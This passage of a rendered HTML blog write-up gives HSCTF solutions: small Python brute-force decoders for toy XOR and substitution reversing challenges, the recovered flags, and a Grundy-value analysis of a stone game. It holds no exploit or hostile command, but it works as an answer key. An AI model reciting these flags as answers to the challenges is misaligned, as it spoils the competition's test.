&amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">6</span>) == <span class="string">&#x27;0&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">3</span>) == <span class="string">&#x27;g&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">8</span>) == <span class="string">&#x27;1&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">4</span>) == <span class="string">&#x27;&#123;&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">9</span>) == <span class="string">&#x27;n&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">7</span>) == <span class="string">&#x27;d&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">10</span>) == <span class="string">&#x27;g&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">2</span>) == <span class="string">&#x27;a&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">12</span>) == <span class="string">&#x27;i&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">5</span>) == <span class="string">&#x27;c&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">17</span>) == <span class="string">&#x27;r&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">14</span>) == <span class="string">&#x27;_&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">18</span>) == <span class="string">&#x27;d&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">16</span>) == <span class="string">&#x27;4&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">19</span>) == <span class="string">&#x27;&#125;&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">15</span>) == <span class="string">&#x27;h&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">13</span>) == <span class="string">&#x27;5&#x27;</span>;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{c0d1ng_i5_h4rd}</p>
</blockquote>
<h3 id="brain-hurt"><a href="#brain-hurt" class="headerlink" title="brain-hurt"></a>brain-hurt</h3><p>Code has substitution by letter, decode it with bruteforce </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&#x27;ZT_YE\\0|akaY.LaLx0,aQR&#123;&quot;C&#x27;</span></span><br><span class="line"></span><br><span class="line">ans = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">enc</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>((<span class="built_in">ord</span>(num) ^ <span class="number">0xFF</span>) % <span class="number">95</span> + <span class="number">32</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">35</span>, <span class="number">127</span>):</span><br><span class="line">        <span class="keyword">if</span> enc(<span class="built_in">chr</span>(j))  == i:</span><br><span class="line">            ans += <span class="built_in">chr</span>(j)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(ans)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{d1D_U_g3t_tH15_onE?}</p>
</blockquote>
<h3 id="mystery-methods"><a href="#mystery-methods" class="headerlink" title="mystery-methods"></a>mystery-methods</h3><p>The java file encodes the program with three steps</p>
<ol>
<li>Base64</li>
<li>Reverse </li>
<li>Base64 </li>
<li>ROT<br>Get flag by doing everything in reverse<br>ciphertext: <code>OS1QYj9VaEolaDgTSTXxSWj5Uj5JNVwRUT4vX290L1ondF1z</code><blockquote>
<p>flag{hsCTF_I5_r3aLLy_fUN}</p>
</blockquote>
</li>
</ol>
<h3 id="keygen"><a href="#keygen" class="headerlink" title="keygen"></a>keygen</h3><p>Another substitution by letter, reverse and bruteforce </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;lfkmq&lt;8=?=&gt;?l&#x27;==&lt;2&#x27;&lt;;=&gt;&#x27;?l&lt;i&#x27;&lt;l&lt;9&lt;h9l::::w&quot;</span></span><br><span class="line"></span><br><span class="line">ans = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> s:</span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>, <span class="number">127</span>):</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">chr</span>(k ^ <span class="number">0xA</span>) == i:</span><br><span class="line">            ans += <span class="built_in">chr</span>(k)</span><br><span class="line"><span class="built_in">print</span>(ans)</span><br><span class="line">(base)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{6275745f-7768-6174-5f6c-6f636b3f0000} </p>
</blockquote>
<h3 id="revrevrev"><a href="#revrevrev" class="headerlink" title="revrevrev"></a>revrevrev</h3><p>The program takes a total of 20 operations, each with three different operations on the number. by adding 1 to s 16 times, the variables become (136,0). Using the four moves left, we can add 32 to each variable. Thus resulting in (168, 32)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="number">0</span></span><br><span class="line">a = <span class="number">0</span></span><br><span class="line">x = <span class="number">0</span></span><br><span class="line">y = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> c <span class="keyword">in</span> ins:</span><br><span class="line">  <span class="keyword">if</span> c == <span class="string">&#x27;r&#x27;</span>: <span class="comment"># rev</span></span><br><span class="line">    s += <span class="number">1</span></span><br><span class="line">  <span class="keyword">elif</span> c == <span class="string">&#x27;L&#x27;</span>: <span class="comment"># left</span></span><br><span class="line">    a = (a + <span class="number">1</span>) % <span class="number">4</span></span><br><span class="line">  <span class="keyword">elif</span> c == <span class="string">&#x27;R&#x27;</span>: <span class="comment"># right</span></span><br><span class="line">    a = (a + <span class="number">3</span>) % <span class="number">4</span></span><br><span class="line">  <span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;this character is not necessary for the solution.&quot;</span>)</span><br><span class="line">  <span class="keyword">if</span> a == <span class="number">0</span>:</span><br><span class="line">    x += s</span><br><span class="line">  <span class="keyword">elif</span> a == <span class="number">1</span>:</span><br><span class="line">    y += s</span><br><span class="line">  <span class="keyword">elif</span> a == <span class="number">2</span>:</span><br><span class="line">    x -= s</span><br><span class="line">  <span class="keyword">elif</span> a == <span class="number">3</span>:</span><br><span class="line">    y -= s</span><br><span class="line">  <span class="built_in">print</span>((x, y))</span><br><span class="line"><span class="keyword">if</span> x == <span class="number">168</span> <span class="keyword">and</span> y == <span class="number">32</span>:</span><br><span class="line">  <span class="built_in">print</span>(<span class="string">&quot;flag&#123;&quot;</span> + ins + <span class="string">&quot;&#125;&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">  <span class="built_in">print</span>(<span class="string">&quot;incorrect sadly&quot;</span>)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{rrrrrrrrrrrrrrrrLRLR}</p>
</blockquote>
<h2 id="Algo-Provided-by-Lucas"><a href="#Algo-Provided-by-Lucas" class="headerlink" title="Algo (Provided by Lucas)"></a>Algo (Provided by <a href=""><strong><code>Lucas</code></strong></a>)</h2><h3 id="Stonegames-with-friends"><a href="#Stonegames-with-friends" class="headerlink" title="Stonegames with friends"></a>Stonegames with friends</h3><p>For each turn we have to remove 1 to <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">⌊</mo><msqrt><mi>x</mi></msqrt><mo stretchy="false">⌋</mo></mrow><annotation encoding="application/x-tex">\lfloor\sqrt{x}\rfloor </annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.05028em;vertical-align:-0.25em;"></span><span class="mopen">⌊</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span><span class="mclose">⌋</span></span></span></span> stones from each pile.</p>
<p>This inspires us to start calculating the grundy values because if we can quickly calculate the grundy values we can xor them together to see if A wins or loses. </p>
<p>Recall that grundy(x) &#x3D; mex(grundy(states reachable by x))<br>in this problem &#x3D; mex(grundy(x - 1), …, grundy(<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>x</mi><mo>−</mo><mo stretchy="false">⌊</mo><msqrt><mi>x</mi></msqrt><mo stretchy="false">⌋</mo></mrow><annotation encoding="application/x-tex">x - \lfloor\sqrt{x}\rfloor</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.66666em;vertical-align:-0.08333em;"></span><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.05028em;vertical-align:-0.25em;"></span><span class="mopen">⌊</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span><span class="mclose">⌋</span></span></span></span>)) </p>
<p>we can brute-force the grundy values in O(n^2) time or O(n*log(n)) with map and amortized complexity (left as exercise to reader), I kept getting compiler errors for trying to declare a 1e9 length array so I tried thinking of a more efficient solution</p>
<p>let’s calculate some some grundy values to see if there’s a pattern<br>let’s write out sqrt(x) for convenience<br>x       &#x3D; 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16<br>sqrt(x) &#x3D; 0, 1, 1, 1, 2, 2, 2, 2, 2, 3,  3,  3,  3,  3,  3,  3,  4<br>g(x)    &#x3D; 0, 1, 0, 1, 2, 0, 1, 2, 0, 3,  1,  2,  0,  3,  1,  2,  4</p>
<p>let’s see what patterns we can find to solve g(x)</p>
<ol>
<li>g(x ^ 2) &#x3D; x</li>
<li>for x &#x3D; 1, 2, 3 or x &#x3D; 4, 5, 6, 7, 8, 9, regions where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">⌊</mo><msqrt><mi>x</mi></msqrt><mo stretchy="false">⌋</mo></mrow><annotation encoding="application/x-tex">\lfloor\sqrt{x}\rfloor</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.05028em;vertical-align:-0.25em;"></span><span class="mopen">⌊</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span><span class="mclose">⌋</span></span></span></span> is the same, the grundy values start looping</li>
<li>when entering a new <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">⌊</mo><msqrt><mi>x</mi></msqrt><mo stretchy="false">⌋</mo></mrow><annotation encoding="application/x-tex">\lfloor\sqrt{x}\rfloor</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.05028em;vertical-align:-0.25em;"></span><span class="mopen">⌊</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span><span class="mclose">⌋</span></span></span></span> region, the new region starts with <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msqrt><mi>x</mi></msqrt></mrow><annotation encoding="application/x-tex">\sqrt{x}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.04em;vertical-align:-0.23972em;"></span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span></span></span></span> + end of old pattern</li>
<li>the pattern for the region with <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">⌊</mo><msqrt><mi>x</mi></msqrt><mo stretchy="false">⌋</mo><mo>=</mo><mi>k</mi></mrow><annotation encoding="application/x-tex">\lfloor\sqrt{x}\rfloor = k</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.05028em;vertical-align:-0.25em;"></span><span class="mopen">⌊</span><span class="mord sqrt"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8002800000000001em;"><span class="svg-align" style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord" style="padding-left:0.833em;"><span class="mord mathnormal">x</span></span></span><span style="top:-2.76028em;"><span class="pstrut" style="height:3em;"></span><span class="hide-tail" style="min-width:0.853em;height:1.08em;"><svg width='400em' height='1.08em' viewBox='0 0 400000 1080' preserveAspectRatio='xMinYMin slice'><path d='M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z'/></svg></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.23972em;"><span></span></span></span></span></span><span class="mclose">⌋</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.69444em;vertical-align:0em;"></span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span></span></span></span> has <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>k</mi><mo>+</mo><mn>1</mn></mrow><annotation encoding="application/x-tex">k + 1</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.77777em;vertical-align:-0.08333em;"></span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">1</span></span></span></span> elements</li>
</ol>
<p>This motivates the solution of transitioning from one sqrt region to the next, answering the grundy queries as we go along. </p>
<p>The final step is to formalize how to transition from one sqrt region to the next.<br>Let us consider the regions <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">[</mo><msup><mi>k</mi><mn>2</mn></msup><mo separator="true">,</mo><mo stretchy="false">(</mo><mi>k</mi><mo>+</mo><mn>1</mn><msup><mo stretchy="false">)</mo><mn>2</mn></msup><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">[k ^ 2, (k + 1) ^ 2)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.064108em;vertical-align:-0.25em;"></span><span class="mopen">[</span><span class="mord"><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.16666666666666666em;"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.064108em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mclose"><span class="mclose">)</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span> and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">[</mo><mo stretchy="false">(</mo><mi>k</mi><mo>+</mo><mn>1</mn><msup><mo stretchy="false">)</mo><mn>2</mn></msup><mo separator="true">,</mo><mo stretchy="false">(</mo><mi>k</mi><mo>+</mo><mn>2</mn><msup><mo stretchy="false">)</mo><mn>2</mn></msup><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">[(k + 1) ^2, (k + 2)^2)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">[</span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.064108em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mclose"><span class="mclose">)</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.16666666666666666em;"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.064108em;vertical-align:-0.25em;"></span><span class="mord">2</span><span class="mclose"><span class="mclose">)</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><br>By the third observation, we need to find the end of the kth region to calculate the start of the (k+1)th region.<br>Let a1, a2, …, ak, a(k+1) be the start of the kth region.<br>By the second observation, the next number will be a1 again, then a2, a3, a4 …<br>This will continue on until we reach the end, after we take <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">(</mo><mi>k</mi><mo>+</mo><mn>1</mn><msup><mo stretchy="false">)</mo><mn>2</mn></msup><mo>−</mo><msup><mi>k</mi><mn>2</mn></msup><mo>−</mo><mi>k</mi><mo>+</mo><mn>1</mn><mo>=</mo><mi>k</mi></mrow><annotation encoding="application/x-tex">(k + 1)^2 - k^2 - k + 1 = k</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.064108em;vertical-align:-0.25em;"></span><span class="mord">1</span><span class="mclose"><span class="mclose">)</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.897438em;vertical-align:-0.08333em;"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.77777em;vertical-align:-0.08333em;"></span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">1</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.69444em;vertical-align:0em;"></span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span></span></span></span> steps.<br>Taking k steps with a k + 1 length pattern is the same as reversing a step - putting the last number of the pattern at the end.<br>Then we add k + 1 to the front of the pattern because of the 4th observation. </p>
<p>Thus, to transition from one sqrt region to the next, we append the last element to front of the pattern and remove the last element from the pattern. Then we add k + 1 to the front of the pattern. </p>
